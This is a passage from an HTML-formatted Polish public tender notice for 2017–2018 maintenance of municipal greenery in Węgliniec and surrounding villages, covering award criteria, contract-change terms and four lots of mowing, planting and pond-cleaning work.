                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	W przypadkach  przewidzianych w umowie dopuszcza się możliwość wprowadzenia zmian w tej umowie z zastrzeżeniem zapisów wskazanych w art. 144 ustawy Pzp.
2.	Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
3.	Zmiany nie mogą  wykraczać poza zakres świadczenia określony w SIWZ.
4.	Wszelkie zmiany umowy możliwe są za obopólnym pisemnym porozumieniem stron w formie aneksu do umowy pod rygorem nieważności.
5.	Zamawiający dopuszcza możliwość zmiany umowy w zakresie: 
1)	wprowadzenia zmian w wykonywanych pracach, jeżeli konieczność wprowadzenia tych zmian pojawiła się dopiero w trakcie realizacji umowy, a zmiany te będą korzystne dla Zamawiającego; 
2)	jeżeli konieczność wprowadzenia zmian spowodowana jest zmianą powszechnie obowiązujących przepisów prawa, ze skutkiem z nich wynikającymi;
3)	zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy, a od których wymagano w SIWZ określonych uprawnień, określonego doświadczenia;
4)	wysokości wynagrodzenia brutto w części dotyczącej podatku VAT, jeżeli w okresie realizacji umowy ulegnie zmianie w drodze ustawowej stawka podatku VAT, będąca elementem wynagrodzenia Wykonawcy. Zmiana zostanie wprowadzona na umotywowany wniosek Wykonawcy w formie aneksu do umowy;
5)	zmiany przepisów powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia.
6.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy- Prawo zamówień publicznych:
1)	zmiana adresów,
2)	utrata mocy  lub zmiana aktów prawnych przywołanych w treści umowy. W każdym takim przypadku Wykonawca ma obowiązek stosowania się do obowiązujących w danych czasie aktów prawa.
7.	Zmiany wskazane w ust. 6 pkt 1 - 2 dokonywane są w drodze jednostronnego oświadczenia danej Strony i wywołują skutek od dnia doręczenia go drugiej Stronie.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>ZADANIE NR 1  Węgliniec, Zielonka, Stary Węgliniec <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Węgliniec
I    KWIETNIKI  - ul. Karola Wojtyły  - 44,00 m2 i 15,20 m2 (2 szt.)  i  KLOMB - przy wjeździe do miasta, ul. Piłsudskiego  14,70 m2
1.	Uzupełnienie ziemi w rabatach do poziomu gruntu wokół rabaty.
2.	Nasadzenie roślin kwiatowych na rabatach w miesiącu V (3-4 gatunki)  12 szt./m2.
3.	Pielęgnacja roślin: podlewanie, zasilanie nawozami mineralnymi, odchwaszczanie,  przycinanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski, przygotowanie gruntu do prac po  okresie zimowym. Koszenie trawnika wokół rabaty.
II  TRAWNIKI - wzdłuż ulic: Sikorskiego, Wojska Polskiego, Kościuszki, Daszyńskiego, Kochanowskiego, Karola Wojtyły, Leśna  ok. 7 000 m2
Skwery  ul. Partyzantów-Sikorskiego, ul. Sikorskiego-Kochanowskiego, ul. Partyzantów-Wojska Polskiego, ul. Kochanowskiego-Skrajna, ul. Plac Wolności - WCK, Skwer Podolski, ul. Wojska Polskiego (przejście z ul. Woj. Polskiego do ul. Partyzantów), Przystanek PKS ,  ul. Woj. Polskiego (siłownia zewnętrzna), WCK pl. Wolości  ok. 4 500 m2 
1.	Koszenie trawników  8 razy w uzgodnieniu z zamawiającym
2.	Nawożenie trawników 3 razy w sezonie.
3.	Jesienne koszenie oraz grabienie liści do całkowitego usunięcia.
4.	Przycinanie krzewów, formowanie żywopłotu  teren siłowni zewnętrznej- dwa razy w sezonie
ul. Sportowa  wykaszanie traw i zarośli na terenie działki  ok. 4000 m2  dwa razy w sezonie 
ul. Kolejowa i ul. Skrajna, Leśna  wycinanie traw i zarośli z poboczy  2 razy w sezonie - ok. 1000 mb  
III DRZEWA  - ciąg ulic: Sikorskiego, Karola Wojtyły, Kościuszki, Partyzantów, Wojska                                   Polskiego, Kochanowskiego  134 szt. 
      1. Utrzymywanie dolnej korony drzew na wysokości 2 m. 
      2. Usuwanie odrostów korzeniowych u pni drzew, każdorazowo przy koszeniu, 
      3. Nasadzenie drzewek  głóg pośredni PaulScarlett   do 5 szt.
   
IV GAZONY kwietnikowe - Skwer Podolski - 2 szt.
1.	Nasadzenie kwiatów w gazonach  40 szt.
2.	Pielęgnacja roślin: podlewanie, zasilanie nawozami mineralnymi, długo działającymi, odchwaszczanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski, przygotowanie gruntu do prac po okresie zimowym, na wiosnę.
V   PASY ZIELENI  (grupy krzewów iglastych, liściastych, bylin) ul. Sikorskiego, ul. Kolejowa - Partyzantów, Wojska Polskiego, WCK pl. Wolności  1 700 m2  
1.	Nasadzenie roślin kwiatowych  300 szt 
2.	Pielęgnacja roślin: podlewanie, zasilanie nawozami mineralnymi, odchwaszczanie, przycinanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski, przygotowanie gruntu do prac po okresie zimowym, na wiosnę.
VI  ŻYWOPŁOT   ul. Karola Wojtyły  ok. 120 mb
1.	Przycinanie i formowanie żywopłotu  3 razy w sezonie.
2.	Usuwanie samosiewów z przestrzeni żywopłotów, przy plewieniu.
VII  PARK MIEJSKI  pow. 1, 47 ha 
Trawniki  8.500m2
1.	Wiosenne grabienie powierzchni trawnikowych.
2.	Koszenie trawników 8 razy sezonie w uzgodnieniu z zamawiającym.
3.	Nawożenie trawników 3 razy w sezonie.
4.	Jesienne koszenie oraz grabienie liści do całkowitego ich  usunięcia.
Drzewa 
1.	Usuwanie posuszu (uschniętych gałęzi) w koronach drzew. 
2.	Obcinanie odrostów u pni drzew, przy koszeniu.
Żywopłot 
1.	Pielęgnacja krzewów żywopłotowych.
2.	Przycięcie żywopłotu z grabu na wysokość 1,80m.
Kwietniki, klomby i krzewy
1.	Klomb rozeta  47 m2  nasadzenie roślin kwiatowych (lawenda, dalia, cynia, begonia, żeniszek, szałwia błyszcząca itp.) w miesiącu V (3-4 gatunki)  12 szt. / m2
2.	Nasadzenie roślin kwiatowych lub wieloletnich  80 szt. w miejscach wskazanych.
3.	Pielęgnacja roślin: podlewanie, zasilanie nawozami mineralnymi, odchwaszczanie, przycinanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski przygotowanie gruntu do prac po okresie zimowym.
4.	Nasadzenie brakujących krzewów na rabatach  ok. 10 szt.
Trejaże i pergole
1.	Pielęgnacja oraz nasadzenie brakujących pnączy.
VIII  UKWIECENIE  ciągu chodników na ul. Wojska Polskiego i ul. Sikorskiego
1.	Dostawa i zainstalowanie 68 szt. donic ukwieconych roślinami w fazie pełnego rozkwitu- pelargonie w kolorze czerwonym - ok. 15 maja wraz z elementami mocującymi w pełni zabezpieczając przed ich upadkiem, do słupów latarń oświetlenia chodnikowego (2 donice na 1 słup lub 1 donica wokół słupa).
2.	Pielęgnacja obsadzeń:
a)  w całym okresie od zawieszenia donic do ich zdjęcia, kwiaty muszą tworzyć zwarty bukiet na całym zewnętrznym obwodzie donicy,
b) podlewanie roślin wodą oraz zasilanie roślin wieloskładnikowym nawozem mineralnym z częstotliwością zapewniającą bujne kwitnienie, zgodnie z zaleceniami producenta,
c)  usuwanie uschniętych fragmentów roślin, w tym uschniętych kwiatostanów,
d) uzupełnianie i wymiana roślin obumarłych lub zamierających, bez względu na przyczynę  zamierania lub obumarcia,
e) zdjęcie donic w m-cu październik  (zamawiający zastrzega sobie możliwość zmiany  terminu w zależności od warunków pogodowych i wegetacji roślin).

IX OŚRODEK ZDROWIA
1.Koszenie trawników ( 1 050 m2)  8 razy w uzgodnieniu z zamawiającym.
2.Nawożenie trawników 3 razy w sezonie.
3.Jesienne koszenie oraz grabienie liści do całkowitego ich usunięcia. 

X INNE
1.	Nasadzenie drzewek w uzgodnieniu z Zamawiającym - 30 szt.
2.	Pielęgnacja drzewek - pionowanie, mocowanie do palików.


Stary Węgliniec

Dom Kultury, Plac Zabaw, Boisko przy DK, plac targowy, skwer przy stawie
1.	Pielęgnacja roślin: podlewanie, zasilanie nawozami mineralnymi, odchwaszczanie, przycinanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski, przygotowanie gruntu do prac po okresie zimowym.
2.	Nasadzenie roślin kwiatowych w ilości 50 szt.
3.	Koszenie trawników (ok. 2 200 m2) 8 razy w sezonie oraz nawożenie.
4.	Jesienne koszenie oraz grabienie liści do całkowitego ich usunięcia.
5.	Wykaszanie traw i usuwanie krzewów z pasów drogowych dróg gminnych na długości 2 000 mb i szerokości 1 mb jednostronnego wykaszania w miejscach wskazanych przez zamawiającego.
Zielonka
PARK , PLAC ZABAW, BOISKO PRZY PLACU ZABAW, BOISKO TRAWIASTE, PLAC PPZY PARKINGU
1.	Pielęgnacja nasadzonych roślin  formowanie, nawożenie.
2.	Koszenie trawników (ok. 900 m2) 8 razy w sezonie w uzgodnieniu z zamawiającym (także wokół ogrodzenia boiska i placu zabaw). 
3.	Koszenie boiska trawiastego i placu za parkingiem (ok. 3000 m2) 3 razy w sezonie.
4.	Koszenie przy świetlicy wiejskiej  200 m2  3 razy w sezonie.
5.	Jesienne koszenie oraz wygrabienie liści do całkowitego ich usunięcia.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/10/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Termin płatnosci</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>ZADANIE NR 2 -  Ruszów, Kościelna Wieś, Okrąglica Ruszów<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I  SKWER /TRAWNIK
1). przy ul. Kantowicza - 700 m2
1.	Pielęgnowanie rabat oraz nasadzonych krzewów w tym: podlewanie, zasilanie nawozami mineralnymi, odchwaszczanie, przycinanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski, przygotowanie gruntu do prac po okresie zimowym. 
2.	Nasadzenie roślin kwiatowych lub wieloletnich  50 szt.
3.	Koszenie trawników  częstotliwość 8 razy w uzgodnieniu z zamawiającym.
4.	Nawożenie trawników 3 razy w sezonie.
5.	Jesienne koszenie i wygrabienie liści  do całkowitego ich usunięcia.

2)   przy ul. Zgorzeleckiej/Bolesławieckiej (obelisk) - 200 m2
1.	Koszenie trawników  8 razy w uzgodnieniu z zamawiającym.
2.	Nawożenie trawników 3 razy w sezonie.
3.	Przycięcie i formowanie żywopłotu  2 razy w sezonie.
4.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia.
3)   przy ul. Żagańskiej/Pl. Partyzantów - 300 m2
1.	Koszenie trawników 8 razy w uzgodnieniu z zamawiającym.
2.	Nawożenie trawników 3 razy w sezonie.
3.	Przycięcie i formowanie żywopłotu  3 razy w sezonie.
4.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia.
4)   przy ul. II Armii WP - 100 m2
1.	Koszenie trawników 8 razy w uzgodnieniu z zamawiającymi.
2.	Pielęgnacja krzewów pęcherzycy kalinolistnej: podlewanie, zasilanie nawozami mineralnymi, odchwaszczanie, przycinanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski.
5)   przy ul. Ratuszowej - 100 m2
1.	Przycięcie i formowanie, uzupełnienie żywopłotu  2 razy w roku.
2.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia.
6)   przy ul. II Armii WP (parking) - 100 m2
1.	Koszenie trawników 8 razy w uzgodnieniu z organizatorem.
2.	Nawożenie trawników 3 razy w sezonie.
3.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia.

II PARK ul. Żagańska  pow. 1,90 ha
Trawniki (ok. 7 850 m2)
1.	Koszenie trawników 8 razy w uzgodnieniu z zamawiającym.
2.	Jesienne koszenie i wygrabienie liści do całkowitego usunięcia.
3.	Nawożenie trawników 3 razy w sezonie.
Klomby - grupy krzewów: iglaste, liściaste, krzewinki, byliny, roślinność szuwarowa, żywopłoty, drzewa  (pow. ok. 1675 m2).
1.	Przycinanie, formowanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski, odchwaszczanie, podlewanie,  zasilanie nawozami mineralnymi, uzupełnianie ściółkowania podłoża przekompostowaną korą sosnową. 
2.	Usuwanie odrostów u pni drzew.
3.	Nasadzenie roślin kwiatowych lub wieloletnich  50 szt.
Stawy  (2900m2)
1.	Czyszczenie stawu i rowu z zarośli i szlamów.
2.	Pielęgnowanie roślin wodnych i przybrzeżnych.   

III DOM KULTURY  800m2 
1.	Koszenie trawników 8 razy w  uzgodnieniu z zamawiającym.
2.	Nawożenie trawników 3 razy w sezonie.
3.	Jesienne koszenie oraz grabienie liści do całkowitego ich usunięcia.

IV OŚRODEK ZDROWIA  ok. 1530m2
1.	Koszenie trawników 8 razy w uzgodnieniu z organizatorem.
2.	Nawożenie trawników 3 razy w sezonie.
3.	Jesienne koszenie oraz grabienie liści do całkowitego ich usunięcia.

V POBOCZA ULIC  ok. 200mb
ul. Dworcowa (od ul. Jana III Sobieskiego do ul. E. Plater), ul. Ratuszowa (od ul. II Armii WP do mostu)  wykaszanie pobocza  4 razy.

VI GAZONY   4 szt.
Pielęgnacja roślin: podlewanie, zasilanie nawozami mineralnymi, odchwaszczanie, przycinanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski, przygotowanie gruntu do prac po okresie zimowym. 

VII INNE 
1.	Nasadzenie drzewek w uzgodnieniu z zamawiającym  10 szt.
2.	Pielęgnacja drzewek  pionowanie, mocowanie do palików.

Kościelna Wieś, Okrąglica
Wykaszanie traw i usuwanie krzewów z pasów drogowych dróg gminnych na długości 4 000 mb i szerokości 1 mb jednostronnego wykaszania w miejscach wskazanych przez zamawiającego.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/10/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin patności </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>ZADANIE NR 3 -  Jagodzin, Piaseczna <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Jagodzin

SKWER - skrzyżowanie Jagodzin  Pieńsk  ok. 120 m2.
1.	Koszenie trawnika  4 razy w sezonie w uzgodnieniu z zamawiającym.
2.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia.
TRAWNIKI : plac zabaw, teren przy Domu Kultury, obok przystanku autobusowego
1.	Koszenie trawników (ok. 2 700 m2) 8 razy (także wokół ogrodzenia) w uzgodnieniu z zamawiającym.  
2.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia. 
BOISKO SPORTOWE
1.	Koszenie trawników (ok. 400 m2)  8 razy w uzgodnieniu z zamawiającym.
2.	Jesienne koszenie, wygrabienie liści do całkowitego ich usunięcia.
3.	Pielęgnacja krzewów, zwalczanie szkodników poprzez odpowiednie opryski, odchwaszczanie, podlewanie, zasilanie nawozami mineralnymi, uzupełnianie ściółkowania podłoża pod roślinami przekompostowaną korą sosnową. 
4.	Wykaszanie traw i usuwanie krzewów z pasów drogowych dróg gminnych na długości 3 000 mb i szerokości 1 mb jednostronnego wykaszania w miejscach wskazanych przez zamawiającego.
Piaseczna

PLAC ZABAW
1.	Koszenie trawników (ok. 400m2) 8 razy w uzgodnieniu z zamawiającym (także przed ogrodzeniem). 
2.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia. .
3.	Pielęgnacja drzew formowanie, usuwanie odrostów.
4.	Wykaszanie traw i usuwanie krzewów z pasów drogowych dróg gminnych na długości 3 000 mb i szerokości 1 mb jednostronnego wykaszania w miejscach wskazanych przez zamawiającego.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/10/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatnośi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>ZADANIE NR 4  Czerwona Woda <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I KLOMB  (skrzyż. ul. 3-go Maja z ul. Górną)  ok.15,00 m2
1.	Pielęgnowanie rabaty kwiatowej  zasilanie roślin (tawuła japońska) nawozami mineralnymi, wymiana obumarłych roślin, podlewanie, formowanie, odchwaszczanie. 
II TRAWNIK (skrzyż. ul. Zgorzelecka i 3-go Maja), targowisko  ok. 600 m2
1.Koszenie trawnika 8 razy w uzgodnieniu z zamawiającym.
2. Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia.
III PARK Z POMNIKIEM - ul. 3-go Maja, pow. 0,16 ha
1.	Koszenie trawników - 8 razy w sezonie w uzgodnieniu z zamawiającym.
2.	Nawożenie trawników 3 razy w sezonie.
3.	Jesienne koszenie i grabienie liści do całkowitego ich usunięcia.
4.	Uzupełnianie brakujących krzewów  5 szt.
5.	Uformowanie żywopłotu z roślin wieloletnich pomiędzy placem zabaw a stawem o długości 37 metrów w uzgodnieniu z zamawiającym.
6.	Pielęgnacja drzew i krzewów - odchwaszczanie, formowanie,  podlewanie, zasilanie  nawozami mineralnymi).
7.	Rozgarnianie kretowisk.
8.	Aleja lipowa  koszenie trawników 8 razy oraz pielęgnacja drzew.  
IV PARK ZE STAWEM  pow. 0,80 ha
Trawniki  (ok.3 660 m 2 )
1.	Koszenie trawników (łącznie z wysepką oraz skarpami stawu i rowu)  8  razy w sezonie w uzgodnieniu z zamawiającym. 
2.	Jesienne koszenie i wygrabienie liści do całkowitego ich usunięcia.
3.	Nawożenie trawników 3 razy w sezonie.
Klomby (róża okrywowa, pięciornik krzewiasty, róża pomarszczona, wierzba purpurowa,                tawuła japońska)
1.	Formowanie krzewów, zwalczanie szkodników poprzez odpowiednie opryski, odchwaszczanie, podlewanie, zasilanie nawozami mineralnymi, uzupełnianie ściółkowania podłoża pod roślinami przekompostowaną korą sosnową. 
Klomb rozeta (15 m2)
1.	Nasadzenie jednorocznych roślin kwiatowych w m-cu V (dalia, gazania, begonia, żeniszek, szałwia błyszcząca itp.) (3-4 gatunki)  12 szt./m2 oraz ich pielęgnacja - podlewanie, zasilanie nawozami mineralnymi, odchwaszczanie, przycinanie, dosadzanie obumarłych sadzonek, zwalczanie szkodników poprzez odpowiednie opryski, przygotowanie gruntu do prac po okresie zimowym.  

Rabata ziołowa 
1.	Pielęgnacja rabaty - odchwaszczanie, podlewanie, nawożenie.
2.	Uzupełnianie brakujących roślin  10 szt.
Pojedyncze krzewy i drzewa
1.	Pielęgnowanie roślin - formowanie, zwalczanie szkodników poprzez odpowiednie opryski, zasilanie nawozami.
2.	Nasadzenie brakujących roślin: rośliny pnące  3 szt. 
3.	Usuwanie odrostów u pni drzew.
Staw (1450 m2 )_i rów ( 100 mb )
1.	Czyszczenie stawu i rowu z zarośli i szlamów (gruntowna konserwacja).

V  ŚWIETLICA WIEJSKA 
1.	Koszenie trawników 8 razy - ok. 800 m2. w uzgodnieniu z organizatorem.
